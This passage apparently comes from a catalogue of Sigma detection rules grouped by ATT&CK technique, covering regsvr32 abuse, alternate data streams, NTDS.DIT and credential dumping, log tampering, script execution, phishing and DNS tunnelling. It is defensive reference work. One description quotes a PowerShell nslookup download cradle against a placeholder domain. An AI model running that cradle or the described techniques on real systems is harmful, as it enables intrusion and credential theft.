    Description: Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.
  • Potentially Suspicious Regsvr32 HTTP/FTP Pattern - Level: medium
    Description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
  • Suspicious Regsvr32 Execution From Remote Share - Level: high
    Description: Detects REGSVR32.exe to execute DLL hosted on remote shares
  • Potentially Suspicious Child Process Of Regsvr32 - Level: high
    Description: Detects potentially suspicious child processes of "regsvr32.exe".
  • Regsvr32 Execution From Potential Suspicious Location - Level: medium
    Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location.
  • Regsvr32 Execution From Highly Suspicious Location - Level: high
    Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious location
  • Regsvr32 DLL Execution With Suspicious File Extension - Level: high
    Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files
  • Scripting/CommandLine Process Spawned Regsvr32 - Level: medium
    Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance.
  • Suspicious WMIC Execution Via Office Process - Level: high
    Description: Office application called wmic to proxy execution through a LOLBIN process. This is often used to break the suspicious parent-child chain (Office app spawns LOLBin).
  • Suspicious WmiPrvSE Child Process - Level: high
    Description: Detects suspicious and uncommon child processes of WmiPrvSE
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 - Level: medium
    Description: Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local
  • Potential EmpireMonkey Activity - Level: high
    Description: Detects potential EmpireMonkey APT activity
  • File Creation by Office Applications - Level: high
    Description: This rule will monitor executable and script file creation by Office applications. Please add more file extensions or magic bytes to the logic of your choice.
attack.t1564.004 25
  • Cmd Stream Redirection - Level: medium
    Description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • Hidden Executable In NTFS Alternate Data Stream - Level: medium
    Description: Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash
  • Suspicious File Download From File Sharing Websites - File Stream - Level: high
    Description: Detects the download of suspicious file type from a well-known file and paste sharing domain
  • Unusual File Download From File Sharing Websites - File Stream - Level: medium
    Description: Detects the download of suspicious file type from a well-known file and paste sharing domain
  • HackTool Named File Stream Created - Level: high
    Description: Detects the creation of a named file stream with the imphash of a well-known hack tool
  • Exports Registry Key To an Alternate Data Stream - Level: high
    Description: Exports the target Registry key and hides it in the specified alternate data stream.
  • Unusual File Download from Direct IP Address - Level: high
    Description: Detects the download of suspicious file type from URLs with IP
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - Level: medium
    Description: Detects the creation of a hidden file or folder with the "::$index_allocation" stream, which can be used as a technique to prevent access to folders and files from tooling such as "explorer.exe" and "powershell.exe"
  • NTFS Alternate Data Stream - Level: high
    Description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
  • Powershell Store File In Alternate Data Stream - Level: medium
    Description: Storing files in an Alternate Data Stream (ADS), similar to Astaroth malware.
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • Suspicious Diantz Alternate Data Stream Execution - Level: medium
    Description: Compresses the target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
  • Suspicious Extrac32 Alternate Data Stream Execution - Level: medium
    Description: Extracts data from a cab file and hides it in an alternate data stream
  • PrintBrm ZIP Creation of Extraction - Level: high
    Description: Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
  • Run PowerShell Script from ADS - Level: high
    Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
  • Potential Rundll32 Execution With DLL Stored In ADS - Level: high
    Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).
  • Execute From Alternate Data Streams - Level: medium
    Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
  • Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI - Level: medium
    Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
  • Use Short Name Path in Command Line - Level: medium
    Description: Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection
  • Use Short Name Path in Image - Level: medium
    Description: Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image detection
  • Use NTFS Short Name in Command Line - Level: medium
    Description: Detects use of the Windows 8.3 short name, which could be used as a method to avoid command-line detection
  • Use NTFS Short Name in Image - Level: medium
    Description: Detects use of the Windows 8.3 short name, which could be used as a method to avoid Image-based detection
attack.t1003.003 25
  • Possible Impacket SecretDump Remote Activity - Zeek - Level: high
    Description: Detects AD credential dumping using the impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml
  • Transferring Files with Credential Data via Network Shares - Zeek - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Ntdsutil Abuse - Level: medium
    Description: Detects potential abuse of ntdsutil to dump ntds.dit database
  • Possible Impacket SecretDump Remote Activity - Level: high
    Description: Detects AD credential dumping using the impacket secretdump HKTL
  • Transferring Files with Credential Data via Network Shares - Level: medium
    Description: Transferring files with well-known filenames (sensitive files with credential data) using network shares
  • Cred Dump Tools Dropped Files - Level: high
    Description: Detects the creation of files with well-known filenames (parts of credential dump software or files produced by them)
  • NTDS.DIT Created - Level: low
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database)
  • NTDS.DIT Creation By Uncommon Parent Process - Level: high
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory
  • NTDS.DIT Creation By Uncommon Process - Level: high
    Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory
  • NTDS Exfiltration Filename Patterns - Level: high
    Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration.
  • Suspicious Get-ADDBAccount Usage - Level: high
    Description: Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers
  • Create Volume Shadow Copy with Powershell - Level: high
    Description: Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information
  • VolumeShadowCopy Symlink Creation Via Mklink - Level: high
    Description: Shadow Copies storage symbolic link creation using operating systems utilities
  • Esentutl Gather Credentials - Level: medium
    Description: Conti recommended to its affiliates to use esentutl to access the dumped NTDS file. Trickbot also uses this utility to get MSEdge info via its module pwgrab.
  • Copying Sensitive Files with Credential Data - Level: high
    Description: Detects the copying of files with well-known filenames (sensitive files with credential data)
  • Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) - Level: medium
    Description: Detects execution of ntdsutil.exe to perform different actions, such as restoring snapshots, etc.
  • Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) - Level: medium
    Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)
  • PUA - DIT Snapshot Viewer - Level: high
    Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
  • Suspicious Process Patterns NTDS.DIT Exfil - Level: high
    Description: Detects suspicious process patterns used in NTDS.DIT exfiltration
  • Shadow Copies Creation Using Operating Systems Utilities - Level: medium
    Description: Shadow Copies creation using operating systems utilities, possible credential access
  • Active Directory Database Snapshot Via ADExplorer - Level: medium
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
  • Suspicious Active Directory Database Snapshot Via ADExplorer - Level: high
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
  • Sensitive File Dump Via Wbadmin.EXE - Level: high
    Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
  • Sensitive File Recovery From Backup Via Wbadmin.EXE - Level: high
    Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
  • Potential Russian APT Credential Theft Activity - Level: critical
    Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
attack.t1552.001 24
  • iOS Implant URL Pattern - Level: critical
    Description: Detects URL pattern used by iOS Implant
  • Suspicious Unattend.xml File Access - Level: medium
    Description: Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended Windows install process
  • Abusing Findstr for Defense Evasion - Level: medium
    Description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism
  • Azure Keyvault Key Modified or Deleted - Level: medium
    Description: Identifies when a Keyvault Key is modified or deleted in Azure.
  • Azure Key Vault Modified or Deleted - Level: medium
    Description: Identifies when a key vault is modified or deleted.
  • Azure Keyvault Secrets Modified or Deleted - Level: medium
    Description: Identifies when secrets are modified or deleted in Azure.
  • Credentials In Files - Linux - Level: high
    Description: Detects attempts to extract passwords with grep
  • Copy Passwd Or Shadow From TMP Path - Level: high
    Description: Detects when the file "passwd" or "shadow" is copied from a tmp path
  • Linux Recon Indicators - Level: high
    Description: Detects events with patterns found in commands used for reconnaissance on Linux systems
  • Hidden Flag Set On File/Directory Via Chflags - MacOS - Level: medium
    Description: Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
  • Credentials In Files - Level: high
    Description: Detects attempts to extract passwords with grep and LaZagne
  • Cisco Collect Data - Level: low
    Description: Collects pertinent data from the configuration files
  • HackTool - Typical HiveNightmare SAM File Export - Level: high
    Description: Detects files written by the different tools that exploit HiveNightmare
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects scriptblock text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Extracting Information with PowerShell - Level: medium
    Description: Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
  • Remote File Download Via Findstr.EXE - Level: medium
    Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
  • Insensitive Subfolder Search Via Findstr.EXE - Level: low
    Description: Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
  • HackTool - WinPwn Execution - Level: high
    Description: Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Automated Collection Command Prompt - Level: medium
    Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data.
  • Active Directory Database Snapshot Via ADExplorer - Level: medium
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.
  • Suspicious Active Directory Database Snapshot Via ADExplorer - Level: high
    Description: Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database to a suspicious directory.
  • Potential Russian APT Credential Theft Activity - Level: critical
    Description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
  • Unattend.XML File Access Attempt - Level: low
    Description: Detects attempts to access the "unattend.xml" file, where credentials might be stored. This file is used during the unattended Windows install process.
  • Potential Password Reconnaissance Via Findstr.EXE - Level: medium
    Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
attack.t1562.002 24
  • Potential NT API Stub Patching - Level: medium
    Description: Detects potential NT API stub patching as seen used by the project PatchingAPI
  • ETW Logging/Processing Option Disabled On IIS Server - Level: medium
    Description: Detects changes to the IIS server configuration in order to disable/remove the ETW logging/processing option.
  • HTTP Logging Disabled On IIS Server - Level: high
    Description: Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests.
  • New Module Module Added To IIS Server - Level: medium
    Description: Detects the addition of a new module to an IIS server.
  • Previously Installed IIS Module Was Removed - Level: low
    Description: Detects the removal of a previously installed IIS module.
  • Windows Event Auditing Disabled - Level: low
    Description: Detects scenarios where system auditing (i.e. Windows event log auditing) is disabled. This may be used in a scenario where an entity wants to bypass local logging to evade detection when Windows event logging is enabled and reviewed. It is also recommended to turn off "Local Group Policy Object Processing" via GPO, which makes sure that Active Directory GPOs take precedence over local/edited computer policies set via something such as "gpedit.msc". Please note that disabling "Local Group Policy Object Processing" may cause issues in scenarios of one-off specific GPO modifications; however, it is recommended to perform these modifications in Active Directory anyway.
  • Important Windows Event Auditing Disabled - Level: high
    Description: Detects scenarios where system auditing for important events such as "Process Creation" or "Logon" events is disabled.
  • EVTX Created In Uncommon Location - Level: medium
    Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard locations. This could indicate tampering with default EVTX locations in order to evade security controls, or simply exfiltration of event logs to search for sensitive information within them. Note that backup software and legitimate administrators might perform similar actions during troubleshooting.
  • HackTool - SharpEvtMute DLL Load - Level: high
    Description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs
  • HackTool - SysmonEnte Execution - Level: high
    Description: Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon
  • Suspicious Svchost Process Access - Level: high
    Description: Detects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.
  • Audit Policy Tampering Via NT Resource Kit Auditpol - Level: high
    Description: Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
  • Audit Policy Tampering Via Auditpol - Level: high
    Description: Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
  • Filter Driver Unloaded Via Fltmc.EXE - Level: medium
    Description: Detects filter driver unloading activity via fltmc.exe
  • Sysmon Driver Unloaded Via Fltmc.EXE - Level: high
    Description: Detects the possible unloading of the Sysmon filter driver via fltmc.exe
  • HackTool - SharpEvtMute Execution - Level: high
    Description: Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs
  • Disable Windows IIS HTTP Logging - Level: high
    Description: Detects the disabling of HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Suspicious Eventlog Clearing or Configuration Change Activity - Level: high
    Description: Detects the clearing or configuration tampering of the EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique was seen used by threat actors and ransomware strains in order to evade defenses.
  • Change Winevt Channel Access Permission Via Registry - Level: high
    Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
  • Disable Windows Event Logging Via Registry - Level: high
    Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
  • Potential EventLog File Location Tampering - Level: high
    Description: Detects tampering with the EventLog service "file" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting.
  • Forest Blizzard APT - File Creation Activity - Level: high
    Description: Detects the creation of specific files inside of ProgramData directory. These files were seen being created by Forest Blizzard as described by MSFT.
  • Forest Blizzard APT - JavaScript Constrained File Creation - Level: medium
    Description: Detects the creation of JavaScript files inside of the DriverStore directory. Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
attack.t1059.005 - 23 rules
  • Visual Basic Script Execution - Level: medium
    Description: Adversaries may abuse Visual Basic (VB) for execution
  • Adwind RAT / JRAT - Registry - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • File Was Not Allowed To Run - Level: medium
    Description: Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • WScript or CScript Dropper - File - Level: high
    Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
  • Adwind RAT / JRAT File Artifact - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Suspicious Child Process Of BgInfo.EXE - Level: high
    Description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Uncommon Child Process Of BgInfo.EXE - Level: medium
    Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - Koadic Execution - Level: high
    Description: Detects command line parameters used by Koadic hack tool
  • Potential Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: medium
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine
  • Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS - Level: high
    Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine
  • Windows Shell/Scripting Processes Spawning Suspicious Programs - Level: high
    Description: Detects suspicious child processes of Windows shell and scripting processes such as wscript, rundll32, powershell, mshta, etc.
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • Potential Dropper Script Execution Via WScript/CScript - Level: medium
    Description: Detects wscript/cscript executions of scripts located in user directories
  • Cscript/Wscript Uncommon Script Extension Execution - Level: high
    Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
  • Suspicious Scripting in a WMI Consumer - Level: high
    Description: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
  • Adwind RAT / JRAT - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Potential APT10 Cloud Hopper Activity - Level: high
    Description: Detects potential process and execution activity related to APT10 Cloud Hopper operation
  • Potential QBot Activity - Level: critical
    Description: Detects potential QBot activity by looking for process executions used previously by QBot
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript - Level: medium
    Description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript
attack.t1566.001 - 21 rules
  • Disk Image Mounting Via Hdiutil - MacOS - Level: medium
    Description: Detects the execution of the hdiutil utility in order to mount disk images.
  • ISO Image Mounted - Level: medium
    Description: Detects the mount of an ISO image on an endpoint
  • Password Protected ZIP File Opened (Email Attachment) - Level: high
    Description: Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.
  • Potential Initial Access via DLL Search Order Hijacking - Level: medium
    Description: Detects attempts to create a DLL file in a known desktop application dependencies folder such as Slack, Teams or OneDrive by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.
  • ISO File Created Within Temp Folders - Level: high
    Description: Detects the creation of an ISO file in the Outlook temp folder or in the AppData temp folder. Typical of Qakbot TTPs from end-July 2022.
  • ISO or Image Mount Indicator in Recent Files - Level: medium
    Description: Detects the creation of a recent-items entry that points to an .ISO, .IMG, .VHD or .VHDX file, as often used in phishing attacks. This can be a false positive on server systems, but on workstations users should rarely mount .iso or .img files.
  • Office Macro File Creation - Level: low
    Description: Detects the creation of new Office macro files on the system
  • Office Macro File Download - Level: medium
    Description: Detects the creation of new Office macro files on the system via an application (browser, mail client).
  • Office Macro File Creation From Suspicious Process - Level: high
    Description: Detects the creation of an Office macro file from a suspicious process
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • Suspicious HWP Sub Processes - Level: high
    Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate exploitation
  • Suspicious Microsoft OneNote Child Process - Level: high
    Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
  • Suspicious Execution From Outlook Temporary Folder - Level: high
    Description: Detects a suspicious program execution in Outlook temp folder
  • Arbitrary Shell Command Execution Via Settingcontent-Ms - Level: medium
    Description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.
  • Suspicious Double Extension File Execution - Level: critical
    Description: Detects suspicious use of an .exe extension after a non-executable file extension (like .pdf.exe) or after a set of spaces or underscores, used to cloak the executable file in spear phishing campaigns
  • Windows Registry Trust Record Modification - Level: medium
    Description: Alerts on trust record modification within the registry, indicating usage of macros
  • Exploit for CVE-2017-0261 - Level: medium
    Description: Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262
  • Droppers Exploiting CVE-2017-11882 - Level: critical
    Description: Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
  • Exploit for CVE-2017-8759 - Level: critical
    Description: Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
  • Ursnif Malware C2 URL Pattern - Level: critical
    Description: Detects Ursnif C2 traffic.
attack.t1087.002 - 20 rules
  • AzureHound PowerShell Commands - Level: high
    Description: Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP - Level: medium
    Description: Detects potential Active Directory enumeration via LDAP
  • AD Privileged Users or Groups Reconnaissance - Level: high
    Description: Detects privileged user or group reconnaissance based on event ID 4661 and the SIDs of known privileged users or groups
  • Potential AD User Enumeration From Non-Machine Account - Level: medium
    Description: Detects read access to a domain user from a non-machine account
  • Reconnaissance Activity - Level: high
    Description: Detects activity such as "net user administrator /domain" and "net group domain admins /domain"
  • BloodHound Collection Files - Level: high
    Description: Detects the default file names output by the BloodHound collection tool SharpHound
  • Malicious PowerShell Commandlets - PoshModule - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Active Directory Computers Enumeration With Get-AdComputer - Level: low
    Description: Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.
  • Malicious PowerShell Commandlets - ScriptBlock - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • Active Directory Structure Export Via Csvde.EXE - Level: medium
    Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
  • HackTool - Bloodhound/Sharphound Execution - Level: high
    Description: Detects command line parameters used by Bloodhound and Sharphound hack tools
  • Suspicious Group And Account Reconnaissance Activity Using Net.EXE - Level: medium
    Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Check whether the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM).
  • Malicious PowerShell Commandlets - ProcessCreation - Level: high
    Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
  • PUA - AdFind Suspicious Execution - Level: high
    Description: Detects AdFind execution with common flags seen used during attacks
  • PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE - Level: high
    Description: Detects active directory enumeration activity using known AdFind CLI flags
  • Renamed AdFind Execution - Level: high
    Description: Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.
  • Suspicious Use of PsLogList - Level: medium
    Description: Detects usage of the PsLogList utility to dump event logs in order to extract admin accounts and perform account discovery, or to delete event logs
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • Enumeration via the Global Catalog - Level: medium
    Description: Detects enumeration of the global catalog (which can be performed using BloodHound or other AD reconnaissance tools). Adjust the threshold according to the size of the domain.
  • Domain User Enumeration Network Recon 01 - Level: medium
    Description: Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPCs (remote procedure calls) used to enumerate a domain controller. The rule was created based on the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
attack.t1071.004 - 19 rules
  • DNS Tunnel Technique from MuddyWater - Level: critical
    Description: Detects DNS tunnel activity of the MuddyWater actor
  • Nslookup PwSh Download Cradle - Level: medium
    Description: This rule tries to detect PowerShell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
  • Cobalt Strike DNS Beaconing - Level: critical
    Description: Detects suspicious DNS queries known from Cobalt Strike beacons
  • Suspicious DNS Query with B64 Encoded String - Level: medium
    Description: Detects suspicious DNS queries using base64 encoding
  • DNS TXT Answer with Possible Execution Strings - Level: high
    Description: Detects strings used in command execution in DNS TXT Answer
  • Suspicious Cobalt Strike DNS Beaconing - DNS Client - Level: critical
    Description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
  • Suspicious Cobalt Strike DNS Beaconing - Sysmon - Level: critical
    Description: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IB report
  • DNS Exfiltration and Tunneling Tools Execution - Level: high
    Description: Detects the execution of well-known DNS exfiltration tools
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Possible DNS Tunneling - Level: high
    Description: Normally, DNS logs contain a limited number of different DNS queries for a single domain. This rule detects a high number of queries for a single domain, which can be an indicator that DNS is used to transfer data.
  • High NULL Records Requests Rate - Level: medium
    Description: Extremely high rate of NULL record type DNS requests from a host in a short period of time. Possible result of iodine tool execution.
  • High DNS Requests Rate - Level: medium
    Description: High number of DNS requests from a host in a short period of time
  • High TXT Records Requests Rate - Level: medium
    Description: Extremely high rate of TXT record type DNS requests from a host in a short period of time. Possible result of Do-exfiltration tool execution.
  • High DNS Requests Rate - Firewall - Level: medium
    Description: High number of DNS requests from a host in a short period of time
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
attack.t1059.007 - 19 rules
  • Adwind RAT / JRAT - Registry - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Suspicious Installer Package Child Process - Level: medium
    Description: Detects the execution of suspicious child processes from a macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters.
  • JXA In-memory Execution Via OSAScript - Level: high
    Description: Detects possible malicious execution of JXA in-memory via OSAScript
  • Potential In-Memory Download And Compile Of Payloads - Level: medium
    Description: Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware
  • File Was Not Allowed To Run - Level: medium
    Description: Detects files that were not allowed to run. AppLocker is a very useful tool, especially on servers where unprivileged users have access, for example terminal servers. You need to configure AppLocker and log collection to receive these events.
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • WScript or CScript Dropper - File - Level: high
    Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe
  • Adwind RAT / JRAT File Artifact - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
  • Csc.EXE Execution Form Potentially Suspicious Parent - Level: high
    Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
  • HTML Help HH.EXE Suspicious Child Process - Level: high
    Description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
  • Suspicious HH.EXE Execution - Level: high
    Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe)
  • HackTool - Koadic Execution - Level: high
    Description: Detects command line parameters used by Koadic hack tool
  • MSHTA Suspicious Execution 01 - Level: high
    Description: Detects suspicious execution patterns of mshta.exe, sometimes involving file polyglotism
  • Node Process Executions - Level: medium
    Description: Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud
  • Potential SquiblyTwo Technique Execution - Level: medium
    Description: Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields
  • Potential Dropper Script Execution Via WScript/CScript - Level: medium
    Description: Detects wscript/cscript executions of scripts located in user directories
  • Cscript/Wscript Uncommon Script Extension Execution - Level: high
    Description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension
  • Adwind RAT / JRAT - Level: high
    Description: Detects javaw.exe in AppData folder as used by Adwind / JRAT
